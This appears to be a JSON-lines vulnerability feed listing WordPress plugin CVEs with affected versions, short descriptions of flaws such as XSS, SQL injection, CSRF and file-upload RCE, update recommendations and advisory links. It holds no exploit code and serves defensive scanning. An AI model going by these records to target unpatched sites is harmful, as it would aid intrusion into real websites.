{"CVE_ID":"CVE-2024-4637","slug":"revslider","versionImpact":"6.7.10","versionEndExcluding":"6.7.11","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.7.10 due to insufficient input sanitization and output escaping on the user supplied Elementor 'wrapperid' and 'zindex' display attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457b5066-da37-4877-9abe-c912bc201f29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457b5066-da37-4877-9abe-c912bc201f29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4581","slug":"revslider","versionImpact":"6.7.10","versionEndExcluding":"6.7.11","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Add Layer widget in all versions up to, and including, 6.7.11 due to insufficient input sanitization and output escaping on the user supplied 'class', 'id', and 'title' attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Successful exploitation of this vulnerability requires an Administrator to give Slider Creation privileges to Author-level users.","recommendation":"Update to version 6.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99b8eb9-1511-4ec0-98f4-c0e0c989fa28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99b8eb9-1511-4ec0-98f4-c0e0c989fa28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1525","slug":"site-reviews","versionEndExcluding":"6.7.1","description":"The Site Reviews WordPress plugin before 6.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ae6bf90-b100-4bb5-bdd7-8acdbd950596\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ae6bf90-b100-4bb5-bdd7-8acdbd950596\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5596","slug":"armember","versionImpact":"6.7","versionEndExcluding":"6.7.1","description":"The ARMember Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.7. This is due to incorrectly implemented nonce validation function on multiple functions. This makes it possible for unauthenticated attackers to modify, or delete user meta and plugin options which can lead to limited privilege escalation.","recommendation":"Update to version 6.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e55591e-c1e9-4667-b04f-4956d2f37d51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e55591e-c1e9-4667-b04f-4956d2f37d51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/armember-complete-wordpress-membership-system\\\/17785056\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/armember-complete-wordpress-membership-system\\\/17785056\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6842","slug":"formidable","versionImpact":"6.7","versionEndExcluding":"6.7.1","description":"The Formidable Forms \u2013 Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name field label and description field label parameter in all versions up to 6.7 (inclusive) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this only affects multi-site installations and installations where unfiltered_html has been disabled. However, in the formidable settings admins can extend form creation, deletion and other management permissions to other user types, which makes it possible for this vulnerability to be exploited by lower level user types as long as they have been granted the proper permissions.","recommendation":"Update to version 6.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47e402c3-e06c-4ac9-8c60-5666cb1101ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47e402c3-e06c-4ac9-8c60-5666cb1101ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6830","slug":"formidable","versionImpact":"6.7","versionEndExcluding":"6.7.1","description":"The Formidable Forms plugin for WordPress is vulnerable to HTML injection in versions up to, and including, 6.7. This vulnerability allows unauthenticated users to inject arbitrary HTML code into form fields. When the form data is viewed by an administrator in the Entries View Page, the injected HTML code is rendered, potentially leading to admin area defacement or redirection to malicious websites.","recommendation":"Update to version 6.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff294b0f-97fe-4d27-bf93-f5bbb57ac1f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff294b0f-97fe-4d27-bf93-f5bbb57ac1f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6205","slug":"payplus-payment-gateway","versionImpact":"6.6.8","versionEndExcluding":"6.6.9","description":"The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.","recommendation":"Update to version 6.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2c5032-2917-418c-aee3-092bdb78a087\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2c5032-2917-418c-aee3-092bdb78a087\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-11638","slug":"gtbabel","versionImpact":"6.6.8","versionEndExcluding":"6.6.9","description":"The Gtbabel WordPress plugin before 6.6.9 does not ensure that the URL to perform code analysis upon belongs to the blog which could allow unauthenticated attackers to retrieve a logged in user (such as admin) cookies by making them open a crafted URL as the request made to analysed the URL contains such cookies.","recommendation":"Update to version 6.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f20336f-e12e-4b09-bcaf-45f7249f6495\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f20336f-e12e-4b09-bcaf-45f7249f6495\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6976","slug":"events-manager","versionImpact":"7.0.3","versionEndExcluding":"6.6.5","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's  shortcodes in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to one of the following versions, or a newer patched version: 6.6.5, 7.0.4","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L485\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L485\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da97a395-64b8-4efd-b189-f917674b1c18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da97a395-64b8-4efd-b189-f917674b1c18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6975","slug":"events-manager","versionImpact":"7.0.3","versionEndExcluding":"6.6.5","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018calendar_header\u2019 parameter in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to one of the following versions, or a newer patched version: 6.6.5, 7.0.4","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/templates\\\/calendar\\\/section-header-navigation.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/templates\\\/calendar\\\/section-header-navigation.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e3e59b-837b-4058-b7bc-a22cff22afb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e3e59b-837b-4058-b7bc-a22cff22afb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6970","slug":"events-manager","versionImpact":"7.0.3","versionEndExcluding":"6.6.5","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to one of the following versions, or a newer patched version: 6.6.5, 7.0.4","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-object.php#L1060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-object.php#L1060\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7320c06e-a7a7-4ed0-93cd-e85d74bae73f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7320c06e-a7a7-4ed0-93cd-e85d74bae73f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8275","slug":"the-events-calendar","versionImpact":"6.6.4","versionEndExcluding":"6.6.4.1","description":"The The Events Calendar plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'tribe_has_next_event' function in all versions up to, and including, 6.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Only sites that have manually added tribe_has_next_event() will be vulnerable to this SQL injection.","recommendation":"Update to version 6.6.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59891c7-db1a-4688-8616-8877d7d7960d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59891c7-db1a-4688-8616-8877d7d7960d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/theeventscalendar.com\\\/knowledgebase\\\/customizing-template-files-2-legacy\\\/\",\"name\":\"https:\\\/\\\/theeventscalendar.com\\\/knowledgebase\\\/customizing-template-files-2-legacy\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.theeventscalendar.com\\\/reference\\\/functions\\\/tribe_has_next_event\\\/\",\"name\":\"https:\\\/\\\/docs.theeventscalendar.com\\\/reference\\\/functions\\\/tribe_has_next_event\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152853%40the-events-calendar&new=3152853%40the-events-calendar&sfp_email=&sfph_mail=#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152853%40the-events-calendar&new=3152853%40the-events-calendar&sfp_email=&sfph_mail=#file18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8493","slug":"the-events-calendar","versionImpact":"6.6.3","versionEndExcluding":"6.6.4","description":"The Events Calendar WordPress plugin before 6.6.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/561b3185-501a-4a75-b880-226b159c0431\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/561b3185-501a-4a75-b880-226b159c0431\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11260","slug":"events-manager","versionImpact":"6.6.3","versionEndExcluding":"6.6.4","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the active_status parameter in all versions up to, and including, 6.6.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/6.6.3\\\/classes\\\/em-events.php#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/6.6.3\\\/classes\\\/em-events.php#L606\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925402a5-e203-4976-b0a9-88c974b540b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925402a5-e203-4976-b0a9-88c974b540b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6528","slug":"revslider","versionEndExcluding":"6.6.19","description":"The Slider Revolution WordPress plugin before 6.6.19 does not prevent users with at least the Author role from unserializing arbitrary content when importing sliders, potentially leading to Remote Code Execution.","recommendation":"Update to version 6.6.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36ced447-84ea-4162-80d2-6df226cb53cb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36ced447-84ea-4162-80d2-6df226cb53cb\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4621","slug":"arforms","versionImpact":"6.5","versionEndExcluding":"6.6","description":"The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33a366d9-6c81-4957-a101-768487aae735\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33a366d9-6c81-4957-a101-768487aae735\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4620","slug":"arforms","versionImpact":"6.5","versionEndExcluding":"6.6","description":"The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.6 allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form","recommendation":"Update to version 6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc34dc2d-d5a1-4e28-8507-33f659ead647\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc34dc2d-d5a1-4e28-8507-33f659ead647\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8617","slug":"quiz-maker","versionImpact":"6.5.9.8","versionEndExcluding":"6.5.9.9","description":"The Quiz Maker WordPress plugin before 6.5.9.9 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.5.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba6b6b82-6f21-45ff-bd64-685ea8ae1b82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba6b6b82-6f21-45ff-bd64-685ea8ae1b82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8743","slug":"file-manager","versionImpact":"6.5.7","versionEndExcluding":"6.5.8","description":"The Bit File Manager \u2013 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to Limited JavaScript File Upload in all versions up to, and including, 6.5.7. This is due to a lack of proper checks on allowed file types. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an administrator, to upload .css and .js files, which could lead to Stored Cross-Site Scripting.","recommendation":"Update to version 6.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314520d5-bd9d-46c1-b903-5e5cb3bb3417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314520d5-bd9d-46c1-b903-5e5cb3bb3417?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161219\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161219\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4323","slug":"google-analyticator","versionEndExcluding":"6.5.6","description":"The Analyticator WordPress plugin before 6.5.6 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce8027b8-9473-463e-ba80-49b3d6d16228\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce8027b8-9473-463e-ba80-49b3d6d16228\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3425","slug":"google-analyticator","versionEndExcluding":"6.5.6","description":"The Analyticator WordPress plugin before 6.5.6 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df1c36bb-9861-4272-89c9-ae76e62f687c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df1c36bb-9861-4272-89c9-ae76e62f687c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7627","slug":"file-manager","versionImpact":"6.5.5","versionEndExcluding":"6.5.6","description":"The Bit File Manager plugin for WordPress is vulnerable to Remote Code Execution in versions 6.0 to 6.5.5 via the 'checkSyntax' function. This is due to writing a temporary file to a publicly accessible directory before performing file validation. This makes it possible for unauthenticated attackers to execute code on the server if an administrator has allowed Guest User read permissions.","recommendation":"Update to version 6.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f29de7a-3f15-4b6d-aad7-6a08151e2113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f29de7a-3f15-4b6d-aad7-6a08151e2113?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7770","slug":"file-manager","versionImpact":"6.5.5","versionEndExcluding":"6.5.6","description":"The Bit File Manager \u2013 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 6.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted upload permissions by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 6.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cae7702-e531-45b9-9131-42edbc073a07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cae7702-e531-45b9-9131-42edbc073a07?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinderConnector.class.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinderConnector.class.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L1210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L1210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L3257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L3257\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6498","slug":"complianz-gdpr","versionEndExcluding":"6.5.6","description":"The Complianz \u2013 GDPR\/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 6.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01c1458d-3e38-4dbf-bb65-80465ea6d0ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01c1458d-3e38-4dbf-bb65-80465ea6d0ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009228%40complianz-gdpr&new=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009228%40complianz-gdpr&new=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
